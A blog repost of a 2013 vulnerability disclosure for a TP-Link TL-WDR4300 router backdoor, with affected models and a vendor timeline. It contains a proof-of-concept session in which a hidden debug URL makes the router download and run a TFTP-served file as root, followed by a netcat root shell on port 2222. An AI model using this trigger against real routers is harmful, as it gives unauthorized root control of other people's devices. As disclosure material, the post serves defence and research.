JerryMeng
JerryMeng

TP-Link http/tftp backdoor

TP-Link http/tftp backdoor

摘自网络,木有整理,今天看见关于D-link后门的文章,想起这篇,遂发。

About the TP-Link Routertp-logo

TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.

Tested Firmware

We tested the remote root PoC on the newest firmware (published on 25.12.2012):

firmware

TL-WDR4300 – tested firmware version

The following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability.

Update: more info about the issues in the router is available here.

Proof of Concept

Update2: it works on WAN port if http admin is open on WAN. Also, many (if not all) other TP-Link devices are affected!
root@secu:~# ls -l /srv/tftp/nart.out -rw-r--r-- 1 root root 871604 Mar 11 18:23 /srv/tftp/nart.out root@secu:~# nc 192.168.0.1 2222 (UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html Connecting to 192.168.0.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: "start_art.html" [ <=> ] 426 --.-K/s in 0s 2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426] root@secu:~# nc 192.168.0.1 2222 ps PID Uid VmSize Stat Command 1 root 404 S init 2 root SW< [kthreadd] 3 root SW< [ksoftirqd/0] 4 root SW< [events/0] 5 root SW< [khelper] 6 root SW< [async/mgr] 7 root SW< [kblockd/0] 8 root SW [pdflush] 9 root SW [pdflush] 10 root SW< [kswapd0] 17 root SW< [mtdblockd] 18 root SW< [unlzma/0] 71 root 2768 S /usr/bin/httpd 76 root 380 S /sbin/getty ttyS0 115200 78 root 208 S ipcserver 82 root 2768 S /usr/bin/httpd 83 root 2768 S /usr/bin/httpd 86 root 732 S ushare -d -x -f /tmp/ushare.conf 92 root 348 S syslogd -C -l 7 96 root 292 S klogd 101 root SW< [napt_ct_scan] 246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf 286 root 2768 S /usr/bin/httpd 299 root 2768 S /usr/bin/httpd 300 root 2768 S /usr/bin/httpd 305 root 2768 S /usr/bin/httpd 307 root 2768 S /usr/bin/httpd 309 root 2768 S /usr/bin/httpd 310 root 2768 S /usr/bin/httpd 389 root 2768 S /usr/bin/httpd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
root@secu:~# ls -l /srv/tftp/nart.out
-rw-r--r-- 1 root root 871604 Mar 11 18:23 /srv/tftp/nart.out
root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html                                                                                                                       --2013-03-09 23:22:31--  http://192.168.0.1/userRpmNatDebugRpm26525557/start_art                                                                                                                     .html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"
 
    [ <=>                                   ] 426         --.-K/s   in 0s
 
2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]
 
root@secu:~# nc 192.168.0.1 2222
ps
  PID  Uid     VmSize Stat Command
    1 root        404 S   init
    2 root            SW< [kthreadd]
    3 root            SW< [ksoftirqd/0]
    4 root            SW< [events/0]
    5 root            SW< [khelper]
    6 root            SW< [async/mgr]
    7 root            SW< [kblockd/0]
    8 root            SW  [pdflush]
    9 root            SW  [pdflush]
   10 root            SW< [kswapd0]
   17 root            SW< [mtdblockd]
   18 root            SW< [unlzma/0]
   71 root       2768 S   /usr/bin/httpd
   76 root        380 S   /sbin/getty ttyS0 115200
   78 root        208 S   ipcserver
   82 root       2768 S   /usr/bin/httpd
   83 root       2768 S   /usr/bin/httpd
   86 root        732 S   ushare -d -x -f /tmp/ushare.conf
   92 root        348 S   syslogd -C -l 7
   96 root        292 S   klogd
  101 root            SW< [napt_ct_scan]
  246 root        348 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  247 root        204 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  251 root        364 S   /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
  286 root       2768 S   /usr/bin/httpd
  299 root       2768 S   /usr/bin/httpd
  300 root       2768 S   /usr/bin/httpd
  305 root       2768 S   /usr/bin/httpd
  307 root       2768 S   /usr/bin/httpd
  309 root       2768 S   /usr/bin/httpd
  310 root       2768 S   /usr/bin/httpd
  389 root       2768 S   /usr/bin/httpd

Details

After the following HTTP request is sent:

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
the router downloads a file (nart.out) from the host which has issed the http request and executes is as root:
tp-link-diag

PoC – diagram

Sample captures from the host which issues the http request:

Wireshark filter

Wireshark filter used to show router tftp traffic

Wireshark filter used to show router tftp traffic

nart.out tftp request

Models affected

  • TL-WDR4300
  • TL-WR743ND (v1.2 v2.0)

History of the bug

12.02.2013 – TP-Link e-mailed with details – no response
22.02.2013 – TP-Link again e-mailed with details – no response
12.03.2013 – public disclosure
14.03.2013 – UPDATE: contact from TP-Link Poland. They asked for some more detailed information. Additional PoC sent.
15.03.2013 – UDPATE: confirmation of the issue (it is WAN exploitable if http admin is available from WAN side)

你可能感兴趣的:(TP-Link http/tftp backdoor)

  • centos7 安装hashcat x10n9 linux运维服务器
    下载hashcat:--》6.2.6https://hashcat.net/files/hashcat-6.2.6.7z安装intel_sdk_for_opencl_applications:wgethttp://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/16284/intel_sdk_for_opencl_applicatio
  • Centos7 安装CMake 地表最强菜鸡 Centos7Centos7安装CMake
    一、环境描述1、系统:Centos7.62、登录用户:root3、版本:CMake3.6.2二、安装步骤步骤一、安装gcc等必备程序包(已安装则略过此步)$yuminstall-ygccgcc-c++makeautomake步骤二、安装wget(已安装则略过此步)$yuminstall-ywget步骤三、获取CMake源码包$wgethttps://cmake.org/files/v3.6/cma
  • 探索无限可能:使用Python LINE Bot SDK构建对话机器人 高慈鹃Faye
    探索无限可能:使用PythonLINEBotSDK构建对话机器人去发现同类优质开源项目:https://gitcode.com/在这个数字化的时代,交互式的聊天机器人已经成为我们日常生活和工作中的一部分。通过LINE平台,我们可以利用强大的PythonLINEBotSDK轻松创建个性化的聊天机器人,并部署在Heroku云服务上,无论你是开发者新手还是经验丰富的程序员,都能快速上手。现在,让我们一起
  • macOS(M1 Pro)安装SQL SERVER Leah8665 开发记录javadockermacos
    前言硬件:MacBookPro2021当前系统:macOS14.5当前docker版本:4.18.0(104112)docker下载地址:https://www.docker.com/get-started/https://www.docker.com/get-started/SQLSERVER下载1、打开终端2、输入:dockerpullmcr.microsoft.com/mssql/serve
  • [Python]如何利用Flask搭建一個Web服務器,並透過Ngrok訪問來實現LINE Bot功能? Learn-Share_HY PythonRaspberryPiLinuxpythonflaskNgrokollamaubuntu人工智能linux
    AIChatBotIHowtoBuildAILINEBotwithOllama,FlaskandNgrok?Flask是一個輕量級的Web框架,主要用於建立基於Python的Web應用和API。它可搭建webhook本地服務器,同時提供靈活的URL路由和HTTP請求處理方式,允許開發者快速啟動並測試應用功能。由於其結構簡單,開發者常用其作為建立和測試MVP(最小可行性產品),同時其也非常適合新手作
  • iis+django+channels+daphne部署websocket通信包含一对一、群聊功能、上传图片 冰红茶阿伟 websocketdjangopython
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档目录前言一、安装对应库二、使用步骤1.后端配置:后端思路:2.前端代码:前端思路:3.一对一和群聊:4.发送图片:5.daphne的启动和部署:http不带证书启动:https带证书启动:总结前言django下使用websocket实现即时通信并部署到iis服务器(无nginx)踩了许多坑,记录下。一、安装对应库python版本需要在
  • 将调用deepseek的python包装成一个方法,使用流式,多轮对话 痕迹* python开发语言
    要将调用DeepSeek的Python代码包装成一个方法,并支持流式输出和多轮对话,你可以按照以下步骤进行。假设你已经有了一个可以调用DeepSeekAPI的函数,并且该API支持流式输出。1.安装必要的库首先,确保你已经安装了requests库,用于发送HTTP请求。pipinstallrequests2.创建DeepSeek客户端类我们可以创建一个DeepSeekClient类来封装与Deep
  • nginx部署Channels实现wss协议请求 只要思想不滑坡办法总比困难多--小鱼干 NginxChannelsuwsginginxChannelsuwsgisupervisordaphne
    在已经用nginx部署完了uwsgi的https请求的前提下我们将https的请求发送给uwsgi进行处理,将websocket请求发送给daphne进行处理,daphne和uwsgi可以使用supervisord进行控制,aupool项目中只用supervisord来控制daphne,uwsgi服务需要单独起。1.安装supervisor:$sudoaptinstallsupervisor2.安
  • 转:tensorflow 数学运算 算法恩仇录 Keras
    来源:https://blog.csdn.net/qq_27009517/article/details/80801666感谢总结!tf.ceil向上取整。K.ceil不能这么操作:
  • 四大作用域(request,session,application,pagecontext) 星星不打輰 JavaWeb前端java
    四大作用域:(servlet或者JSP页面之间共享数据,servlet有四种作用域)一、请求(requestscope)作用域定义:表示数据再一次http请求和响应期间有效,从客户端发送请求到服务器响应请求的整个过程(1次请求中数据是有效的)生命周期:当一次请求处理完成,即浏览器得到响应了,请求作用域中的数据就会被销毁适用场景:请求转发,表单提交—》在request中存放数据(request.se
  • 2025姓名配对测算系统最新源码 带后台 legendji 服务器开源delphi游戏
    2025姓名配对测算系统最新源码带后台一套网上全新的UI,用于姓名配对,支持投流各大平台,全开源可进行二开!投流的老板可以放心使用这套后台登录地址:/admin账号admin密码admin123链接:https://pan.baidu.com/s/1mY81psH2yLpYeUjPxIUSKA提取码:n2fs备用下载地址:http://pan.1234f.com:5212/s/mW9sv电子文档:
  • 部署django+nginx实现ws/wss的websocket生产环境通信 body221 nginxjavalinuxdockerpython
    本文阐述如何使用nginx部署基于django应用的websocket通信。之后会写django基于channels实现websocket的通信文章。简单介绍下:websocket的主要协议ws/wss,类似于http/https的关系,如果使用了https那就必须使用wss协议。首先django应用启动ws服务,启动runworkerpythonmanage.pyrunworker具体实现处理的
  • WiFi_CE_占用带宽自动化测试_基于 Python + 罗德频谱仪(SCPI指令) 岁月_流沙 自动化测试_Pythonpython测试工具
    2.4G_WiFi_CE_占用带宽测试标准请参考下面博客2.4G_WiFi_CE_占用带宽测试_频谱分析仪测试2.4g-CSDN博客https://blog.csdn.net/weixin_57515011/article/details/146164656?spm=1001.2014.3001.5502测试组网图:下面代码示例,只是基于罗德频谱仪测试OBW的基础操作,如有疑问,欢迎留言沟通。im
  • 项目如何安装本地tgz包并配置局部registry 开水好喝 NodeJSjavascript
    一、判断包来源是否正确1.检查urlcurl2.查看包是否存在npmview--registry=二、局部registry配置步骤:1.全局配置如果你希望对所有项目生效,可以将这行配置添加到全局.npmrc文件中。全局.npmrc文件通常位于以下路径:Windows:C:\Users\\.npmrc添加内容:@sdp.nd:registry=http://registry.npm.sdp.nd2.
  • ESXi 8.0 中已弃用且不受支持的设备 (88172) esxi
    DevicesdeprecatedandunsupportedinESXi8.0ESXi8.0中已弃用且不受支持的设备(88172)请访问原文链接:https://sysin.org/blog/devices-unsupported-in-esxi-8/查看最新版。原创作品,转载请保留出处。作者主页:sysin.org该文为官方KB的翻译和整理,方便查询ESXi8.0中不再支持的硬件设备。描述由于
  • VMware ESXi 7.0 U3s 发布下载 - 领先的裸机 Hypervisor esxi
    VMwareESXi7.0U3s-领先的裸机HypervisorVMwareESXi7.0Update3Standard&AllCustomImageforESXi7.0U3InstallCD请访问原文链接:https://sysin.org/blog/vmware-esxi-7-u3/查看最新版。原创作品,转载请保留出处。作者主页:sysin.org产品简介VMwareESXi:专门构建的裸机H
  • 基于多二阶广义积分器的正负序谐波提取方法 救救电气鼠鼠 谐波治理锁相环学习matlab数学建模分布式能源程序人生
    仿真获取链接:基于多二阶广义积分器的正负序谐波提取方法该仿真复现由PedroRodriguez等学者提出了一种名为多谐振频率锁定环(MSOGI-FLL)的创新同步方法,旨在解决电网电压畸变、不平衡及频率波动场景下电力变流器的精准同步问题。传统锁相环(PLL)依赖相位跟踪,易受相位突变和谐波干扰影响,而MSOGI-FLL通过频率锁定https://mbd.pub/o/bread/aJabk5tp摘要
  • Jmeter中的身份认证:cookie和token 我是飞鸟呀 JMeterjmeter
    为什么需要cookie或token浏览器与服务器间通过HTTP协议进行信息交互。但是HTTP协议是一种无状态协议,这意味着每个HTTP请求之间都是相互独立的,服务器在处理每个请求时不会保存前一个请求的状态信息。这样导致在一些诸如加入购物车、提交订单这样需要状态保持的业务场景中,无法确认用户的身份信息。于是,需要引入一种机制来维护会话状态。cookie或者token机制便可以在应用层实现一定程度的状
  • ESXi 7.0 中弃用和不支持的设备 (77304) esxi
    DevicesdeprecatedandunsupportedinESXi7.0ESXi7.0中弃用和不支持的设备(77304)请访问原文链接:https://sysin.org/blog/devices-unsupported-in-esxi-7/查看最新版。原创作品,转载请保留出处。作者主页:sysin.org该文为官方KB的翻译和整理,方便查询ESXi7.0中不再支持的硬件设备。描述ESXi
  • 第一次安装VSCode 终端显示 npm : 无法加载文件 C:\Program Files\nodejs\npm.ps1,因为在此系统上禁止运行脚本。 白臻 前端面试题vscodenpmide
    在VSCode的终端中显示以下报错信息npm:无法加载文件C:\ProgramFiles\nodejs\npm.ps1,因为在此系统上禁止运行脚本。有关详细信息,请参阅https:/go.microsoft.com/fwlink/?LinkID=135170中的about_Execution_Policies。所在位置行:1字符:1npminstall~~~+CategoryInfo:Securi
  • Kokoro 开源中文语音合成TTS模型应用示例(比ChatTTS速度快) 逢生博客 python自然语言处理TTSKokoro中文语音合成
    文章目录Github简介Kokoro模型中文模型安装依赖完整示例Githubhttps://github.com/hexgrad/kokoro简介Kokoro是一个开放权重的TTS模型,拥有8200万个参数。尽管它采用轻量级架构,但其质量却可与大型模型媲美,而且速度更快、成本更低。凭借Apache许可的权重,Kokoro可部署在从生产环境到个人项目的任何地方。Kokoro模型英文:https://
  • 使用 langchain_deepseek 实现自然语言转数据库查询SQL 逢生博客 数据库langchainsqlDeepSeek
    文章目录Github官网简介腾讯云DeepSeekAPIDeepSeekAPIChatDeepSeek安装相关库创建.env文件验证API接口生成数据库查询SQL获取测试用数据库验证数据库查询生成数据库查询SQLGithubhttps://github.com/langchain-ai/langchain官网https://python.langchain.com/docs/introductio
  • Prompt Optimizer 项目教程 劳丽娓Fern
    PromptOptimizer项目教程prompt-optimizerMinimizeLLMtokencomplexitytosaveAPIcostsandmodelcomputations.项目地址:https://gitcode.com/gh_mirrors/pr/prompt-optimizer1.项目目录结构及介绍prompt-optimizer/├──README.md├──requir
  • Rocky Linux 教程 洪淼征
    RockyLinux教程rockyRockyLinuxisacommunityenterpriseOperatingSystemdesignedtobe100%bug-for-bugcompatiblewithEnterpriseLinuxcreatedinresponsetotheeffectivediscontinuationofCentOS.项目地址:https://gitcode.com/
  • 嵌入式数据结构—学习笔记 二叉树 忘山君 嵌入式数据结构数据结构学习笔记
    二叉树的层次遍历_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1ee4y1q77b/?p=25&spm_id_from=333.1007.top_right_bar_window_history.content.click&vd_source=01c0a0b4e215da5cc9a422b60e2ca405一.二叉树的原理及优缺点二叉树是计算机科学中
  • OpenBMC:BmcWeb 生效路由1 基于method分类路由 风静如云 OpenBMClinux
    OpenBMC:BmcWeb添加路由4设置method-CSDN博客经过这几步,路由对象已经被添加到了allRules中了,在完成等待http请求前,还需要做一些工作1.调用顺序app.run()->validate()->router.validate()2.router.validate()voidvalidate(){for(std::unique_ptr&rule:allRules){if
  • java redirect https跳转http问题 只有一个途径 httpjavahttps
    一、前提nginx:httpstomcat:httpjava:springmvc二、问题描述通过https访问到nginx,通过nginxproxy_pass到http的tomcat。正常访问都正常,但是只要javaredirect就跳转到http。#nginx中配置proxy_redirecthttp://https://;实现流程:根据nginx的不同执行阶段,来完成Locationhttp到
  • HTTP介绍以及(GET/POST/PUT/DELETE)应用介绍 筱姌 前后端http网络协议网络
    WWW是“WorldWideWeb”的缩写,中文名为“万维网”。它是一个基于超文本和HTTP协议的全球性信息系统,通过互联网连接了世界各地的服务器和用户。用户可以使用浏览器访问各种网站,浏览网页、获取信息、进行交互等。WWW的核心技术包括HTML(超文本标记语言)、URL(统一资源定位符)和HTTP(超文本传输协议)等。HTML用于创建网页内容,URL用于定位网络上的资源,HTTP则用于在客户端和
  • C 语言中的隐性共享内存:全局未初始化匿名结构体变量 C语言允许存在多个未初始化的同名全局变量 shimly123456 C
    url:https://stackoverflow.com/questions/7189982/two-variables-with-same-name-and-type-in-two-different-c-files-compile-with-g
  • 26.Nginx HTTP之ngx_http_block oyw5201314ck Nginx-0.1.0源码学习
    上一篇提到ngx_http_block(或者说http块指令)是Nginx中HTTP模块的入口,这一篇学习下ngx_http_block这个指令回调中做了哪些工作。从以下代码中,我们可以看出,ngx_http_block主要做了如下工作:1.创建HTTP配置上下文2.对http指令块进行配置解析3.初始化HTTP各处理阶段4.对HTTP监听的端口、地址、虚拟主机名称进行合并整理,然后创建对应的监听
  • springmvc 下 freemarker页面枚举的遍历输出 杨白白 enumfreemarker
    spring mvc freemarker 中遍历枚举 1枚举类型有一个本地方法叫values(),这个方法可以直接返回枚举数组。所以可以利用这个遍历。 enum public enum BooleanEnum { TRUE(Boolean.TRUE, "是"), FALSE(Boolean.FALSE, "否");
  • 实习简要总结 byalias 工作
    来白虹不知不觉中已经一个多月了,因为项目还在需求分析及项目架构阶段,自己在这段 时间都是在学习相关技术知识,现在对这段时间的工作及学习情况做一个总结: (1)工作技能方面 大体分为两个阶段,Java Web 基础阶段和Java EE阶段 1)Java Web阶段 在这个阶段,自己主要着重学习了 JSP, Servlet, JDBC, MySQL,这些知识的核心点都过 了一遍,也
  • Quartz——DateIntervalTrigger触发器 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208559 一.概述 simpleTrigger 内部实现机制是通过计算间隔时间来计算下次的执行时间,这就导致他有不适合调度的定时任务。例如我们想每天的 1:00AM 执行任务,如果使用 SimpleTrigger,间隔时间就是一天。注意这里就会有一个问题,即当有 misfired 的任务并且恢复执行时,该执行时间
  • Unix快捷键 18289753290 unixUnix;快捷键;
    复制,删除,粘贴: dd:删除光标所在的行                             &nbs
  • 获取Android设备屏幕的相关参数 酷的飞上天空 android
    包含屏幕的分辨率  以及 屏幕宽度的最大dp 高度最大dp   TextView text = (TextView)findViewById(R.id.text); DisplayMetrics dm = new DisplayMetrics(); text.append("getResources().ge
  • 要做物联网?先保护好你的数据 蓝儿唯美 数据
    根据Beecham Research的说法,那些在行业中希望利用物联网的关键领域需要提供更好的安全性。 在Beecham的物联网安全威胁图谱上,展示了那些可能产生内外部攻击并且需要通过快速发展的物联网行业加以解决的关键领域。 Beecham Research的技术主管Jon Howes说:“之所以我们目前还没有看到与物联网相关的严重安全事件,是因为目前还没有在大型客户和企业应用中进行部署,也就
  • Java取模(求余)运算 随便小屋 java
            整数之间的取模求余运算很好求,但几乎没有遇到过对负数进行取模求余,直接看下面代码: /** * * @author Logic * */ public class Test { public static void main(String[] args) { // TODO A
  • SQL注入介绍 aijuans sql注入
    二、SQL注入范例 这里我们根据用户登录页面 <form action="" > 用户名:<input type="text" name="username"><br/> 密 码:<input type="password" name="passwor
  • 优雅代码风格 aoyouzi 代码
    总结了几点关于优雅代码风格的描述: 代码简单:不隐藏设计者的意图,抽象干净利落,控制语句直截了当。 接口清晰:类型接口表现力直白,字面表达含义,API 相互呼应以增强可测试性。 依赖项少:依赖关系越少越好,依赖少证明内聚程度高,低耦合利于自动测试,便于重构。 没有重复:重复代码意味着某些概念或想法没有在代码中良好的体现,及时重构消除重复。 战术分层:代码分层清晰,隔离明确,
  • 布尔数组 百合不是茶 java布尔数组
      androi中提到了布尔数组;   布尔数组默认的是false,  并且只会打印false或者是true   布尔数组的例子;  根据字符数组创建布尔数组 char[] c = {'p','u','b','l','i','c'}; //根据字符数组的长度创建布尔数组的个数 boolean[] b = new bool
  • web.xml之welcome-file-list、error-page bijian1013 javaweb.xmlservleterror-page
    welcome-file-list 1.定义: <welcome-file-list> <welcome-file>login.jsp</welcome> </welcome-file-list>  2.作用:用来指定WEB应用首页名称。   error-page1.定义: <error-page&g
  • richfaces 4 fileUpload组件删除上传的文件 sunjing clearRichfaces 4fileupload
     页面代码               <h:form id="fileForm">            <rich:
  • 技术文章备忘 bit1129 技术文章
    Zookeeper http://wenku.baidu.com/view/bab171ffaef8941ea76e05b8.html http://wenku.baidu.com/link?url=8thAIwFTnPh2KL2b0p1V7XSgmF9ZEFgw4V_MkIpA9j8BX2rDQMPgK5l3wcs9oBTxeekOnm5P3BK8c6K2DWynq9nfUCkRlTt9uV
  • org.hibernate.hql.ast.QuerySyntaxException: unexpected token: on near line 1解决方案 白糖_ Hibernate
    文章摘自:http://blog.csdn.net/yangwawa19870921/article/details/7553181   在编写HQL时,可能会出现这种代码: select a.name,b.age from TableA a left join TableB b on a.id=b.id  如果这是HQL,那么这段代码就是错误的,因为HQL不支持
  • sqlserver按照字段内容进行排序 bozch 按照内容排序
    在做项目的时候,遇到了这样的一个需求:           从数据库中取出的数据集,首先要将某个数据或者多个数据按照地段内容放到前面显示,例如:从学生表中取出姓李的放到数据集的前面;          select * fro
  • 编程珠玑-第一章-位图排序 bylijinnan java编程珠玑
    import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.Writer; import java.util.Random; public class BitMapSearch {
  • Java关于==和equals chenbowen00 java
    关于==和equals概念其实很简单,一个是比较内存地址是否相同,一个比较的是值内容是否相同。虽然理解上不难,但是有时存在一些理解误区,如下情况: 1、 String a = "aaa"; a=="aaa"; ==> true 2、 new String("aaa")==new String("aaa
  • [IT与资本]软件行业需对外界投资热情保持警惕 comsci it
          我还是那个看法,软件行业需要增强内生动力,尽量依靠自有资金和营业收入来进行经营,避免在资本市场上经受各种不同类型的风险,为企业自主研发核心技术和产品提供稳定,温和的外部环境...       如果我们在自己尚未掌握核心技术之前,企图依靠上市来筹集资金,然后使劲往某个领域砸钱,然
  • oracle 数据块结构 daizj oracle数据块块结构行目录
    oracle 数据块是数据库存储的最小单位,一般为操作系统块的N倍。其结构为: 块头--〉空行--〉数据,其实际为纵行结构。 块的标准大小由初始化参数DB_BLOCK_SIZE指定。具有标准大小的块称为标准块(Standard Block)。块的大小和标准块的大小不同的块叫非标准块(Nonstandard Block)。同一数据库中,Oracle9i及以上版本支持同一数据库中同时使用标
  • github上一些觉得对自己工作有用的项目收集 dengkane github
    github上一些觉得对自己工作有用的项目收集 技能类 markdown语法中文说明 回到顶部 全文检索 elasticsearch bigdesk elasticsearch管理插件 回到顶部 nosql mapdb 支持亿级别map, list, 支持事务. 可考虑做为缓存使用 C
  • 初二上学期难记单词二 dcj3sjt126com englishword
    dangerous 危险的 panda 熊猫 lion 狮子 elephant 象 monkey 猴子 tiger 老虎 deer 鹿 snake 蛇 rabbit 兔子 duck 鸭 horse 马 forest 森林 fall 跌倒;落下 climb 爬;攀登 finish 完成;结束 cinema 电影院;电影 seafood 海鲜;海产食品 bank 银行
  • 8、mysql外键(FOREIGN KEY)的简单使用 dcj3sjt126com mysql
    一、基本概念 1、MySQL中“键”和“索引”的定义相同,所以外键和主键一样也是索引的一种。不同的是MySQL会自动为所有表的主键进行索引,但是外键字段必须由用户进行明确的索引。用于外键关系的字段必须在所有的参照表中进行明确地索引,InnoDB不能自动地创建索引。 2、外键可以是一对一的,一个表的记录只能与另一个表的一条记录连接,或者是一对多的,一个表的记录与另一个表的多条记录连接。 3、如
  • java循环标签 Foreach shuizhaosi888 标签java循环foreach
    1. 简单的for循环 public static void main(String[] args) { for (int i = 1, y = i + 10; i < 5 && y < 12; i++, y = i * 2) { System.err.println("i=" + i + " y="
  • Spring Security(05)——异常信息本地化 234390216 exceptionSpring Security异常信息本地化
    异常信息本地化          Spring Security支持将展现给终端用户看的异常信息本地化,这些信息包括认证失败、访问被拒绝等。而对于展现给开发者看的异常信息和日志信息(如配置错误)则是不能够进行本地化的,它们是以英文硬编码在Spring Security的代码中的。在Spring-Security-core-x
  • DUBBO架构服务端告警Failed to send message Response javamingtingzhao 架构DUBBO
     废话不多说,警告日志如下,不知道有哪位遇到过,此异常在服务端抛出(服务器启动第一次运行会有这个警告),后续运行没问题,找了好久真心不知道哪里错了。    WARN 2015-07-18 22:31:15,272 com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(84)
  • JS中Date对象中几个用法 leeqq JavaScriptDate最后一天
    近来工作中遇到这样的两个需求 1. 给个Date对象,找出该时间所在月的第一天和最后一天 2. 给个Date对象,找出该时间所在周的第一天和最后一天   需求1中的找月第一天很简单,我记得api中有setDate方法可以使用 使用setDate方法前,先看看getDate var date = new Date(); console.log(date); // Sat J
  • MFC中使用ado技术操作数据库 你不认识的休道人 sqlmfc
    1.在stdafx.h中导入ado动态链接库 #import"C:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","end")2.在CTestApp文件的InitInstance()函数中domodal之前写::CoIniti
  • Android Studio加速 rensanning android studio
    Android Studio慢、吃内存!启动时后会立即通过Gradle来sync & build工程。 (1)设置Android Studio a) 禁用插件 File -> Settings...  Plugins 去掉一些没有用的插件。 比如:Git Integration、GitHub、Google Cloud Testing、Google Cloud
  • 各数据库的批量Update操作 tomcat_oracle javaoraclesqlmysqlsqlite
    MyBatis的update元素的用法与insert元素基本相同,因此本篇不打算重复了。本篇仅记录批量update操作的 sql语句,懂得SQL语句,那么MyBatis部分的操作就简单了。   注意:下列批量更新语句都是作为一个事务整体执行,要不全部成功,要不全部回滚。 MSSQL的SQL语句  WITH R AS(   SELECT 'John' as name, 18 as
  • html禁止清除input文本输入缓存 xp9802 input
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off"; eg: <input type="text" autocomplete="off" name
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他